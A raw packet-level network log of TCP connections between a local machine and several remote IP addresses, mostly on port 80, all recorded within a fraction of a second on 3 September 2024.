Sep 3, 2024 17:13:20.752921104 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.752933025 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.752943039 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.752953053 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.752976894 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.752976894 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.753020048 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.753197908 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.753207922 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.753218889 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.753232956 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.753235102 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.753243923 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.753249884 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.753256083 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.753267050 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.753292084 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.753292084 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.753305912 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.753720999 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.753731966 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.753741980 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.753751993 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.753763914 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.753772020 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.753776073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.753787994 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.753798008 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.753808975 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.753817081 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.753817081 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.753820896 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.753834963 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.753835917 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.753848076 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.753849030 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.753895998 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.753895998 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.754080057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754091024 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754101992 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754112005 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754123926 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754133940 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754143953 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754153967 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754157066 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.754157066 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.754165888 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754184008 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754189014 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.754196882 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754201889 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.754209042 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754220009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754230022 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754240990 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754249096 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.754249096 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.754252911 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754265070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754273891 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.754292965 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.754352093 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.754492998 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754509926 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754520893 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754530907 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754539013 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.754539013 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.754542112 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754553080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754564047 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.754565001 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754576921 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754586935 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754597902 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754605055 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.754605055 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.754610062 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754621983 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754626989 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.754626989 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.754645109 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754656076 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754667997 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754677057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754688978 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.754689932 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.754689932 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.754713058 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.754728079 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.755692959 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.755706072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.755716085 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.755726099 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.755736113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.755747080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.755758047 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.755763054 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.755763054 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.755769014 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.755783081 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.755789995 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.755789995 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.755794048 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.755820036 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.755847931 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.768137932 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:20.810023069 CEST	49722	45580	192.168.2.8	65.21.18.51
Sep 3, 2024 17:13:20.846863031 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.847038031 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.847048044 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.847058058 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.847101927 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.847146988 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.849380970 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.849394083 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.849404097 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.849457979 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.849463940 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.849481106 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.849488020 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.849490881 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.849507093 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.849518061 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.849530935 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.849544048 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.849565029 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.849652052 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.849663019 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.849695921 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.849701881 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.849709034 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.849720001 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.849730968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.849742889 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.849759102 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.849759102 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.849788904 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.849910975 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.849921942 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.849931955 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.849942923 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.849958897 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.849968910 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.849972963 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.849972963 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.849980116 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.849992037 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.850008011 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.850042105 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.850042105 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.850270987 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.850313902 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.850416899 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.850428104 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.850438118 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.850447893 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.850459099 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.850461006 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.850471973 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.850474119 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.850485086 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.850496054 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.850506067 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.850513935 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.850513935 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.850518942 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.850532055 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.850550890 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.850573063 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.850652933 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.850694895 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.850836992 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851130009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851151943 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851164103 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851176023 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851202965 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.851202965 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.851221085 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.851258039 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851269007 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851279020 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851286888 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851303101 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851310968 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.851310968 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.851320982 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851331949 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851342916 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851353884 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851360083 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.851360083 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.851366043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851381063 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851391077 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851401091 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851411104 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.851412058 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.851418018 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851447105 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851452112 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.851458073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851469040 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851475000 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.851488113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851492882 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.851500034 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851511002 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.851511002 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851547003 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.851547956 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.851726055 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851739883 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851752043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851763010 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851778030 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.851782084 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851793051 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851800919 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.851800919 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.851802111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851809025 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851814985 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851819992 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851821899 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.851826906 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851839066 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851851940 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.851875067 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.851917982 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.852293968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852304935 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852314949 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852325916 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852336884 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852348089 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852349043 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.852349043 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.852360964 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852372885 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852382898 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852392912 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852400064 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.852400064 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.852431059 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.852435112 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852447033 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852452040 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.852458954 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852471113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852492094 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852495909 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.852495909 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.852503061 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852510929 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.852515936 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852528095 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852534056 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.852539062 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852554083 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852572918 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.852572918 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.852601051 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.852741003 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852751970 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852762938 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852773905 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852783918 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852796078 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.852796078 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.852835894 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.852835894 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.852901936 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852914095 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852924109 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852935076 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852948904 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852958918 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.852961063 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852972984 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852983952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852996111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.852996111 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.852996111 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.853007078 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.853013039 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.853017092 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.853023052 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.853027105 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.853032112 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.853037119 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.853038073 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.853044987 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.853110075 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.853339911 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.853352070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.853374958 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.853415012 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.903166056 CEST	80	49734	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:20.905792952 CEST	49734	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:20.948517084 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.948535919 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.948548079 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.948559046 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.948570013 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.948580027 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.948590994 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.948606968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.948615074 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.948659897 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.948683023 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.948694944 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.948704004 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.948719025 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.948731899 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.948734999 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.948746920 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.948755026 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.948759079 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.948771000 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.948782921 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.948793888 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.948798895 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.948798895 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.948832035 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.948858976 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.949096918 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.949107885 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.949117899 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.949157000 CEST	49730	80	192.168.2.8	52.212.52.84
